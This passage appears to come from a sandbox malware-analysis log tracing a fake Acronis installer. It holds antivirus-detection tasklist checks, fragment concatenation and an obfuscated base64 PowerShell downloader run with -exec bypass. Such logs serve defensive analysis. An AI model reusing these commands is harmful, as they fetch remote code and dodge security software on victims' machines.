                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\650429\Palestine.com Palestine.com D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                Source: unknownProcess created: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe "C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe"
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 650429
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\650429\Palestine.com Palestine.com D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -ENc LgAoACgARwBFAFQALQB2AGEAUgBJAEEAQgBMAGUAIAAnACoATQBkAHIAKgAnACkALgBuAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoAbwBJAG4AJwAnACkAIAAoACgAKAAnAFMARQB0AC0AdgBhAFIASQBhAEIAbABlACAAKAA2AFMAdgA4AG0AYQA2AFMAdgArADYAUwB2AEYAWgA2AFMAdgApACAAIAAoACAAWwBUAFkAcAAnACsAJwBFAF0AKAA2AFMAdgB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADEAfQA2AFMAdgAtAEYAbABUAFYAZQBsAFQAVgAsAGwAVAAnACsAJwBWAEkATgBsAFQAVgAsAGwAVABWAFMAeQAnACsAJwBTAFQAbABUAFYALABsAFQAVgBtAC4AaQBvAGwAVABWACwAbABUAFYALgBTAGUARQBLAG8AUgBJAEcAbABUAFYAKQApADsAIABzAEUAdAAtAEkAVABlAE0AIAAgAFYAYQByAGkAYQBiAGwAZQA6ADgAQQBQAGMAIAAgACgAIABbAFQAeQBwAGUAXQAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ACcAKwAnADYAUwB2ACAALQBGACAAbABUAFYARABsAFQAVgAsAGwAVABWAFMAWQBzAGwAVABWACwAbABUAFYAdABFAE0ALgBnAFUAJwArACcASQBsAFQAJwArACcAVgApACAAIAApACAAOwAgAHMAVgAgAGMAZwAwACcAKwAnAHEAIAAoACAAWwB0AFkAUABlAF0AKAA2AFMAdgB7ADMAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQA2AFMAdgAgAC0ARgBsAFQAVgB0AGUATQAuAGkATwAnACsAJwBsAFQAVgAsAGwAVABWAC4AUABsAFQAVgAsAGwAVABWAGgAbABUAFYALABsAFQAVgBTAFkAUwBsAFQAVgAsAGwAVABWAEEAVAAnACsAJwBsAFQAVgApACkAJwArACcAIAA7ACAAUwBlAHQALQBWAGEAcgBpACcAKwAnAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAB1AEIAMgBnAHQAIAAtAFYAYQBsAHUAZQAgACgAWwBUAFkAUABlAF0AKAA2AFMAdgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQA2AFMAdgAgAC0AZgAgAGwAVABWAEUAbQAuAEkAJwArACcATwAuAEYAbABUAFYALABsAFQAVgBTAHkAbABUAFYALABsAFQAVgBTAFQAbABUAFYALABsAFQAVgBJAEwARQBsAFQAVgApACkAIAAgADsAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAHMAYwBSAEkAUABUAEIATABPAEMAawAgAC0AVgBhAGwAdQBlACAAKAB7AAoAIAAnACsAJwAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAFoASQBQAFUAUgBsACAALQBWAGEAbAB1AGUAIAAoADYAUwB2AHsAMwB9AHsANwB9AHsANgB9AHsANAB9AHsAOQB9AHsAMQB9AHsAMQAwAH0AewA4AH0AewAwAH0AewA1AH0AewAyAH0ANgBTAHYAIAAtAGYAbABUAFYAdABsACcAKwAnAFQAVgAsAGwAVABWAHAALwBsACcAKwAnAFQAVgAsAGwAVABWAHQAeAB0AGwAVABWACwAbABUAFYAaAB0AGwAVABWACwAbABUAFYAaQBwAHQAZQBkAGUAbABUAFYALABsAFQAVgBfAGMAbABwAF8AcABhAG4ALgBsAFQAVgAsAGwAVABWAHMAOgAvAC8AawBsAGwAVABWACwAbABUAFYAdABwAGwAVABWACwAbABUAFYAbgBsAFQAVgAsAGwAVABWAGgAbwBhAC4AcwBoACcAKwAnAG8AbABUAFYALABsAFQAVgBpAGwAVABWACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAdwBFAEIAYwBsAEkARQBOAHQAIAAtAFYAYQBsAHUAZQAgACgALgAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ADYAUwB2ACAALQBmAGwAVABWAGoAZQBjAHQAbABUAFYALABsAFQAVgBOAGUAdwBsAFQAVgAsAGwAVABWAC0ATwBiAGwAVABWACkAIAAoADYAUwB2AHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ADYAUwB2AC0AZgAgAGwAVABWAGUAdAAuAFcAbABUAFYALABsAFQAVgBTAHkAcwAnACsAJwB0AGUAbQAuAE4AbABUAFYALABsAFQAVgBlAGwAVABWACwAbABUAFYAJwArACcAYgBDAGwAaQBlAG4AdABsAFQAVgApACkACgAnACsAJwAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAJwArACcAbABlACAALQBOAGEAbQBlACAAWgBpAFAAZABhAHQAQQAgAC0AVgBhAGwAdQBlACcAKwAnACAAKABEAHkARQB7AHcAZQBCAFUAbQBCAEMATABCAFUAbQBJAEUAbgBUAH0ALgAoADYAUwB2AHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9ADYAUwB2ACAALQBmAGwAVABWAGEAdABsAFQAVgAsAGwAVABWAGEAZABEAGwAVABWACwAbABUAFYAYQBsAFQAVgAsAGwAVABWAEQAbwB3AG4AbABvAGwAVABWACkALgBJAG4AdgBvAGsAZQAoACcAKwAnAEQAeQBFAHsAegBCAFUAbQBJAFAAQgBVAG0AVQByAGwAfQApACcAKwAnACkAC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe "C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe "C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe"
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp "C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$50362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe "C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp "C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$60362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Users\user\AppData\Roaming\Panorado\electronics.exe "C:\Users\user\AppData\Roaming\Panorado\\electronics.exe" "C:\Users\user\AppData\Roaming\Panorado\\crooners.eml"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe "C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe"
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp "C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$6036C,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess created: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe "C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp "C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$80362,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 650429Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "GERMANY" False Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming DJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\650429\Palestine.com Palestine.com DJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -ENc LgAoACgARwBFAFQALQB2AGEAUgBJAEEAQgBMAGUAIAAnACoATQBkAHIAKgAnACkALgBuAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoAbwBJAG4AJwAnACkAIAAoACgAKAAnAFMARQB0AC0AdgBhAFIASQBhAEIAbABlACAAKAA2AFMAdgA4AG0AYQA2AFMAdgArADYAUwB2AEYAWgA2AFMAdgApACAAIAAoACAAWwBUAFkAcAAnACsAJwBFAF0AKAA2AFMAdgB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADEAfQA2AFMAdgAtAEYAbABUAFYAZQBsAFQAVgAsAGwAVAAnACsAJwBWAEkATgBsAFQAVgAsAGwAVABWAFMAeQAnACsAJwBTAFQAbABUAFYALABsAFQAVgBtAC4AaQBvAGwAVABWACwAbABUAFYALgBTAGUARQBLAG8AUgBJAEcAbABUAFYAKQApADsAIABzAEUAdAAtAEkAVABlAE0AIAAgAFYAYQByAGkAYQBiAGwAZQA6ADgAQQBQAGMAIAAgACgAIABbAFQAeQBwAGUAXQAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ACcAKwAnADYAUwB2ACAALQBGACAAbABUAFYARABsAFQAVgAsAGwAVABWAFMAWQBzAGwAVABWACwAbABUAFYAdABFAE0ALgBnAFUAJwArACcASQBsAFQAJwArACcAVgApACAAIAApACAAOwAgAHMAVgAgAGMAZwAwACcAKwAnAHEAIAAoACAAWwB0AFkAUABlAF0AKAA2AFMAdgB7ADMAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQA2AFMAdgAgAC0ARgBsAFQAVgB0AGUATQAuAGkATwAnACsAJwBsAFQAVgAsAGwAVABWAC4AUABsAFQAVgAsAGwAVABWAGgAbABUAFYALABsAFQAVgBTAFkAUwBsAFQAVgAsAGwAVABWAEEAVAAnACsAJwBsAFQAVgApACkAJwArACcAIAA7ACAAUwBlAHQALQBWAGEAcgBpACcAKwAnAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAB1AEIAMgBnAHQAIAAtAFYAYQBsAHUAZQAgACgAWwBUAFkAUABlAF0AKAA2AFMAdgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQA2AFMAdgAgAC0AZgAgAGwAVABWAEUAbQAuAEkAJwArACcATwAuAEYAbABUAFYALABsAFQAVgBTAHkAbABUAFYALABsAFQAVgBTAFQAbABUAFYALABsAFQAVgBJAEwARQBsAFQAVgApACkAIAAgADsAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAHMAYwBSAEkAUABUAEIATABPAEMAawAgAC0AVgBhAGwAdQBlACAAKAB7AAoAIAAnACsAJwAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAFoASQBQAFUAUgBsACAALQBWAGEAbAB1AGUAIAAoADYAUwB2AHsAMwB9AHsANwB9AHsANgB9AHsANAB9AHsAOQB9AHsAMQB9AHsAMQAwAH0AewA4AH0AewAwAH0AewA1AH0AewAyAH0ANgBTAHYAIAAtAGYAbABUAFYAdABsACcAKwAnAFQAVgAsAGwAVABWAHAALwBsACcAKwAnAFQAVgAsAGwAVABWAHQAeAB0AGwAVABWACwAbABUAFYAaAB0AGwAVABWACwAbABUAFYAaQBwAHQAZQBkAGUAbABUAFYALABsAFQAVgBfAGMAbABwAF8AcABhAG4ALgBsAFQAVgAsAGwAVABWAHMAOgAvAC8AawBsAGwAVABWACwAbABUAFYAdABwAGwAVABWACwAbABUAFYAbgBsAFQAVgAsAGwAVABWAGgAbwBhAC4AcwBoACcAKwAnAG8AbABUAFYALABsAFQAVgBpAGwAVABWACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAdwBFAEIAYwBsAEkARQBOAHQAIAAtAFYAYQBsAHUAZQAgACgALgAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ADYAUwB2ACAALQBmAGwAVABWAGoAZQBjAHQAbABUAFYALABsAFQAVgBOAGUAdwBsAFQAVgAsAGwAVABWAC0ATwBiAGwAVABWACkAIAAoADYAUwB2AHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ADYAUwB2AC0AZgAgAGwAVABWAGUAdAAuAFcAbABUAFYALABsAFQAVgBTAHkAcwAnACsAJwB0AGUAbQAuAE4AbABUAFYALABsAFQAVgBlAGwAVABWACwAbABUAFYAJwArACcAYgBDAGwAaQBlAG4AdABsAFQAVgApACkACgAnACsAJwAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAJwArACcAbABlACAALQBOAGEAbQBlACAAWgBpAFAAZABhAHQAQQAgAC0AVgBhAGwAdQBlACcAKwAnACAAKABEAHkARQB7AHcAZQBCAFUAbQBCAEMATABCAFUAbQBJAEUAbgBUAH0ALgAoADYAUwB2AHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9ADYAUwB2ACAALQBmAGwAVABWAGEAdABsAFQAVgAsAGwAVABWAGEAZABEAGwAVABWACwAbABUAFYAYQBsAFQAVgAsAGwAVABWAEQAbwB3AG4AbABvAGwAVABWACkALgBJAG4AdgBvAGsAZQAoACcAKwAnAEQAeQBFAHsAegBCAFUAbQBJAFAAQgBVAG0AVQByAGwAfQApACcAKwAnACkACJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe "C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe"Jump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 650429
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\650429\Palestine.com Palestine.com D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe "C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe "C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe"
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp "C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$50362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe "C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp "C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$60362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Users\user\AppData\Roaming\Panorado\electronics.exe "C:\Users\user\AppData\Roaming\Panorado\\electronics.exe" "C:\Users\user\AppData\Roaming\Panorado\\crooners.eml"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
